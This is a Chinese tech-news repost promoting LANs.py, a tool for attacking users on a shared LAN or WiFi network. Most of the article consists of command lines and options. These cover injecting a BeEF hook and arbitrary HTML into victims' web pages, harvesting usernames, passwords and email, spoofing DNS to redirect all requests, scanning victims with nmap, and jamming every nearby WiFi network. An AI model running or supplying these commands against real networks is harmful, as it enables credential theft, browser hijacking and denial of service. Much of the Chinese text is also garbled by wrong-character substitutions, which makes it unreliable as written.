作家
登录

LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

作者: 来源: 2017-09-18 16:05:31 阅读 我要评论

【沙龙】51CTO诚邀您9月23号和多位技巧大年夜咖一路聊智能CDN的优化之路,抓紧时光哦!


LANs.py功能简介

1.      主动寻找当前收集中最为活泼的WLAN用户,并对个中的一名用户实施监控,然后向该用户所拜访的Web页面注入随便率性HTML或JavaScript代码;

依附组件

Linux、python-scapy、python-nfqueue(nfqueue-bindings 0.4-3)、aircrack-ng、python-twisted、BeEF (optional)、nmap、nbtscan、tcpdump。(如不雅你不知道目标用户的IP地址,那么你还须要一块支撑混淆模式的无线网卡)

测试情况为Kali Linux,动员进击的设备地址为192.168.0.5,目标设备的IP地址为192.168.0.10。

所有的可选操作项:

Python LANs.py  [-h] [-b BEEF] [-c CODE] [-u] [-ip IPADDRESS][-vmac VICTIMMAC]                [-d] [-v] [-dns DNSSPOOF] [-a][-set] [-p] [-na] [-n]                [-i INTERFACE] [-r REDIRECTTO][-rip ROUTERIP]                [-rmac ROUTERMAC] [-pcap PCAP][-s SKIP] [-ch CHANNEL]                [-m MAXIMUM] [-no] [-tTIMEINTERVAL] [--packets PACKETS]                [--directedonly] [--accesspointACCESSPOINT]

对象应用

今朝该对象支撑大年夜以下协定收集数据:HTTP、FTP、IMAP、POP3和IRC。LANs.py将会打印出URL地址所返回的资本中前135个字符,并主动忽视结尾是.jpg、.jpeg、.gif、.css、.ico、.js、.svg和.woff的URL地址。除此之外,它还可以或许输出随便率性协定下传输的用户名/暗码、以及接收或发送的电子邮件和IRC消息。

常用敕令:

python LANs.py -u -p

其他常用敕令:

python LANs.py -u -p -d -ip 192.168.0.10

-ip:设置目标IP地址

HTML注入:

python LANs.py -bhttp://192.168.0.5:3000/hook.js

向目标用户所拜访的页面中注入一个BeEF钩子( http://beefproject.com/ ,【 参考教程 】),注入的参数会担保在<script>标签中,所以你可以在一个JavaScript文件中的随便率性地位输入内容。

python LANs.py -c'<title>Owned.</title>'

向目标用户所拜访的页面中注入随便率性HTML代码。对象起首会测验测验在第一个<head>标签之后注入内容,如不雅掉败则测验测验在第一个</head>标签之前注入内容。膳绫擎给出的示例代码会将页面标题(title)修改为’Owned.’。

攫取pcap文件:

python LANs.py -pcap libpcapfilename -ip192.168.0.10

为了成功攫取pcap文件中的内容,你须要应用-ip参数指定目标IP。该功能的一个长处就是用户无需应用root权限便可履行该脚本。

DNS欺骗:

python LANs.py -a -r 80.87.128.67

-a选项将会对目标发出的每一次DNS请求进行欺骗进击,并将用户请求重定向至-r参数所制订的地址。无论用户在地址栏中输入的是什么地址,他们都将会被重定向到stallman.org(80.87.128.67)。

python LANs.py -dns eff.org

2.      干扰邻近的WiFi收集,干扰范围取决于无线网卡的机能。我们可以经由过程修改设备来实现干扰所有人的WiFi旌旗灯号或仅干扰某一特定用户的WiFi旌旗灯号。然则LANs.py不支撑对用户同时进行WiFi干扰和监听。

python LANs.py -v -d -p -n -na -set -a -r80.87.128.67 -c '<title>Owned.</title>' -b http://192.168.0.5:3000/hook.js-ip 192.168.0.10

干扰所有的WiFi收集:

python LANs.py --jam

仅干扰指假寓入点:

python Lans.py --jam --accesspoint01:MA:C0:AD:DY

所有的可悠揭捉?项

惯例应用:

-b BEEF_HOOK_URL:将BeEF hookURL注入到目标用户所拜访的每一个页面中,例如-b http://192.168.1.10:3000/hook.js 。

-c ‘HTML CODE’:向目标用户拜访的页面中注入随便率性HTML代码。

-d:查看目标用户拜访的图片。

-pcap PCAP_FILE: 解析pcap文件中所有的数据包; 须要输入-ip[target's IP address]参数。

-rmac ROUTER_MAC:指定路由器的MAC地址。

-dns DOMAIN:对指定DNS域名进行DNS欺骗进击,例如-dnsfacebook.com。

-a:对用户的所有DNS请求进行DNS欺骗进击。

-r IPADDRESS: 仅用于-dnsDOMAIN选项。

-u:打印出目标用户所应用的URL地址。

-i INTERFACE: 指假寓口,例如-i wlan0。

-ip:指定目标IP地址。

-n: 对目标履行nmap扫描。

-na:在后台对目标履行更具进击性的nmap扫描,并将扫描结不雅输出到[victim IP address].nmap.txt。

-p:打印出FTP/IMAP/POP/IRC/HTTP协定下传输的用户名/暗码、以及接收或发送的电子邮件和IRC消息。

-d:查看所有的图片

-rip ROUTER_IP:指定路由器的IP地址。

-sMAC_Address_to_skip:指定需跳过的MAC地址。

该敕令将会对域名eff.org及其阁下名进行DNS欺骗。

其他应用:

-m MAXIMUM: 指定进击客户端的最大年夜数量。

–jam:对2.4GHz无线接入点以及客户端进行干扰进击。

WiFi干扰:

-t TIME_INTERVAL: 设置进击距离。

–packets NUMBER:指定每一次进击中发送的数据包数量。

–accesspoint ROUTER_MAC:输入目标AP的MAC地址。

* 参考来源: DanMcInerney , FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM

【编辑推荐】

  1. 代码中的汉字能阻挡CIA黑客?别沉醉了!他们在招中文黑客

      推荐阅读

      多亏中国 苹果终于允许“打赏”功能了

    固然比来更新的指导方针中仍然保存了这条内容,但苹不雅增长了一条额外内容,许可在不向苹不雅付出费用的情况下进行打赏。这条新增的3.2.1条目写道:当时的指导方针写道:&ldquo;应用可以应用应用内购泉币让用户&lsq>>>详细阅读


    本文标题:LANs.py:一款可以实现代码注入,无线渗透和WiFi用户监控的强大工具

    地址:http://www.17bianji.com/lsqh/37491.html

关键词: 探索发现

乐购科技部分新闻及文章转载自互联网,供读者交流和学习,若有涉及作者版权等问题请及时与我们联系,以便更正、删除或按规定办理。感谢所有提供资讯的网站,欢迎各类媒体与乐购科技进行文章共享合作。

网友点评
自媒体专栏

评论

热度

精彩导读
栏目ID=71的表不存在(操作类型=0)